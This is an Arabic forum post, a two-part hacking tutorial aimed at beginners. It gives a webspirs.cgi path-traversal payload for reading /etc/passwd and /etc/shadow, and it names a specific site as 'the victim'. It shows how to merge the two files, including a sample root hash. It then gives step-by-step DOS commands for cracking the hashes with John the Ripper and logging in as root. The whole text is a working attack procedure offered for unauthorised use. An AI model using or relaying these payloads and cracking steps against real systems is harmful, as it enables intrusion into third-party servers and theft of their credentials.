بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته ..... كيفكم يا احلى اعضاء لاحلى منتدى ..... يا رب تكونوا بخير وصحة وسلامة ملاحظة .. لازم تعرفون ان الاختراق مايتم الا بوجود ثغره في الموقع !!! والثغرااات كثير ولكن اكثر الثغراااااا ت تستخدم من نظام لينوكس Linux وتكون مكتوبة بأحد اللغات بيرل او ++C وعند حصول احدنا على ثغره ,,,,, يحتاج الى مفسر الى اللغة المكتوبه بها الثغره هذه !!!! وهذه والحمد لله متوفر في Linux . الان انا ما عندي Linux هذا يعني ما اقدر اخترق موقع ؟؟؟؟؟؟؟ لالالالالالالالالالالالال الالا تقدر ونص !!!! ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــ نبدأ الان بأول ثغره نقدر نستخدمها من ويندووز !!! اسهل الثغرااات هي ثغرات CGI وهي كثيره جدا ,,, اليوم اريد ان اشرح احد هذه الثغرات : الملف المشكله " او الثغره " يدعى webspirs.cgi هذا الملف هو المساعد على اختراق الموقع !!! ومنه نستطيع لقط " لطش " ملف الباسووورد !! الثغره عباره عن اضافة نضيقها الى اسم الموقع ويتم الاختراق بها !!! ماهي هذه الاضافه ؟؟؟؟؟؟ هي /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd طيب هي راح تكون على الشكل التالي : /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwdاسم الموقع اللي بتخترقه الان انا دورت على موقع نطبق عليه الكلام هذا !!!!!!!! الموقع الضحيه هو : http://wilsonweb2.hwwilson.com/ كل ماعلينا هو لصق الثغره في الموقع والحصوووول على ملف الباسووورد !!!! لتصبح على الشطل التالي : http://wilsonweb2.hwwilson.com/etc/passwd اممممممممممممممممممممممم الموقع اخترق عن طريق الثغره هذه ممتااااااااز !!!!! لكن الباسووورد للاسف مشفر !!!! والحل ؟؟؟؟؟ سهل ان شاء الله !!!! نحتاج الى كود اخر لنكشف التشفير ونغير الكلمات المشفره الى كلمات واضحة ونستنتج الباسووورد للموقع !!! الان الكلمة المشفره تكون في ملف اسمه shadow كيف نجيبة !!! بالكود التالي : /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/shadow وبتطبيقه على موقعنا نحصل على : http://wilsonweb2.hwwilson.com/etc/shadow الان وجدنا الباسووورد المشفر نحتاج الى شوية تعديلات بسيطة لتكوين ملف وكسر التشفير واستخراج الباسوور للموقع . ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــ كيف هذه التعديلات ؟؟؟؟ ملف الشادو به باسوورد الروت " مدير الموقع " root !!! الان نعمل التالي : الحين ملف passwd في بعد كل اسم X مثل root:X من ملف شادو تقارن كل اكس بما يقابله من تشفير وتحطه مكانه ,,, بالمقارنه بصورة سريعه root:x: = JTTIe4QG268fg:10643 ,,,JTTIe4QG268fg:10643 تبدلها بالاكس ممكن يكون الملف مختلفه رموزه عندي وعندك !!! لكن احنا نكرر العمليه على كل اكس في الملف الاول ونغيرها بما يقابلها بالملف الثاني !! يا شباب الفقره هذه والله صعب شرحها لكن اهم شي التركيز في المكتوب !!! طيب لما ننسخ ونلصق فين نكتب الناتج ؟؟؟ نكتب الناتج في مستند جديد وليكن الدفتر او صفحة وورد !!! هذه بدايه بسيطة لمستند الدفتر اللي انا مسويه للبرنامج !!! root:XOT4AiUKMRcKQ:10643 :0:1:Super-User:/:/sbin/sh daemon:NP:6445 :1:1::/: bin:NP:6445 :2:2::/usr/bin: sys:NP:6445 :3:3::/: adm:NP:6445 :4:4:Admin:/var/adm: lp:NP:6445 اكيد واضحة التغييرات فيه !!! طيب خلاص زبطنا كل شي الان والمستند جاهز خلصنا !!!!! لالالالالالالالالالالالال الالالالالالالالالالالالا لالالالالالالالالالالالال الالالا باقي نكسر التشفير الان باستخدام برنامج وين البرنامج ؟؟؟؟ وين ؟؟؟ دقيقة اخرفش في اوراقي واجيب لكم الرنامج : اهاااا هذه وصلة تحميل الرنامج : http://www.openwall.com/john/john-16d.zip نزلوا البرنامج واحفظوا مستند الورد حقكم وانتظروني في الدرس القادكم : كسر التشفيررررررررر " وربي تعبت من الكتابه اهم شي لا احد يتفلسف ويفتح برنامج كسر الحماية عشان الواحد يبدأ خطوة خطوة !!! نزل البرنامج وخليه على ضغطه !!! لا تستعجل جايك بالدرس انا حبيت اعلمك خطوة خطوة ماابي اكثر عليك الدروس بعدين يتشتت ذهنك افهم الدرس وتابع معي الدرس القادم كيف تكسر التشفير !! =-=-=-=- نقلته حرف حرف ولا حرف طالع منه ولا منه (KRKR) __________________ http://www.m3gic.com/vb/attachment.php?s=&postid=47356 __________________________________________________ _______________ تكملة الدرس ======= هذا الدرس سيكون تكملة للدرس السابق وهو اختراق المواقع !!! اليوم سوف نتطرق إلى " أهم خطوة " في الاختراق إلا وهي كسر التشفير !!! توصلنا في الدرس السابق إلى الكلمة السرية ولكن للأسف كانت مشفره " وهي دائما ما تكون مشفره " !!! لذا لابد من كسر الشيفره والحصول على الكلمة السرية خطوات كسر التشفير : 1- أولا قم بفتح الملف المضغوط الموجود على الموقع التالي : http://www.openwall.com/john/john-16d.zip عند فكك للضغط سوف تجد الملف المضغوط في unzipped إذا ما تعرف اتبع المسار التالي : جهاز الكمبيوتر >>> C >>> unzipped الآن سوف تجد المجلد التالي في unzipped وهو : john-16d افتح المجلد سوف تجد داخله مجلد بالاسم التالي : JOHN-16 عند فتحك للمجلد سوف تجد مجلدين وهما DOC و RUN أهم شي عندنا هو مجلد RUN 2- ألان أكيد الكل قام بعمل التغييرات في كلمة السر المشفرة ودمج الملفان مع بعضهما البعض ولم يتبقى إلا حفظ الملف باسم passwd وبدون امتداد !!!! طيب واللي ما يعرف يحفظ بدون امتداد !!!!! وش يسوي ؟؟؟؟ يتبع الخطوات التالية : أولا يفتح الملف أكيد أنت كتبته في الورد طيب J اعمل أولا روح إلى حفظ باسم واحفظه باسم passwd ثم اعمل قص للملف وانسخه في مجلد الويندوز اللي موجود في C الآن رووح وشغل الدوووووس واكتب التالي : ren passwd.doc passwd تأكد انك داخل مجلد ويندوز !!!! من الدوس طبعا اذا لم تكن في داخل ويندوز اكتب التالي windows cd ثم اكتب السطر السابق . بعد ذلك اذهب لمجلد الويندوز وابحث عن passwd ثم اعمل لها قص وارجع إلى ملفنا القدييييييييييييييييم RUN والصقها فيه !!!! 3- الآن لم يتبقى لدينا إلا القليل " هانت يا لربع " !!!!! افتح الدوس من جديد واكتب التالي : إذا كنت داخل مجلد ويندوز اكتب مايلي : cd john-16\run أما إذا كنت على السي اكتب السطرين التاليين : cd windows ثم انتر وبعد ذلك اكتب : cd john-16\run ثم انتر بعد ذلك اكتب السطر التالي : john -i passwd ثم انتر الآن سوف يقوم الدوس بكسر الشيفره !!!! كل ما عليك هو أن تضغط انتر كل خمس دقائق !! وتلاحظ كلمة السر !!! وسوف تحفظ النتيجة في الملف john.pot الموجود في RNN وعلى فكره بعض عمليات الكسر تأخذ دقا يق وبعضها ساعات الآن لم يتبقى سوى اختراق الموقع : تروح تخترقهم باليوزر root والباسوورد الناتجة عندك خاتمه : أنا كتبت هذا الموضوع بأبسط الطرق الممكنة حيث كان بمقدوري شرحه في 10 اسطر ولكن أنا اعتبرت أنني اشرح إلى ناس ليس لديهم خبره في الدوس أو كسر التشفير !!! :bd: :ab: __________________ وانشالله يكون وفيت بشرحي وهده الطريقة انا طبقتها عندي بالينيكس وطلعت تمام بس لا تنسونا بردودكم الحلوة .... رجاء
اللهم انت ربي ... لا اله الا انت خلقتني.. وانا عبدك وانا على عهدك.. و وعدك ما استطعت اعوذ بك من شر ما صنعت.. ابوء لك بنعمتك علي .. وابوء لك بذنبي.. فاغفرلي يا رب.. فأنه لا يغفر الذنوب الا انت.
قوانين المنتدى
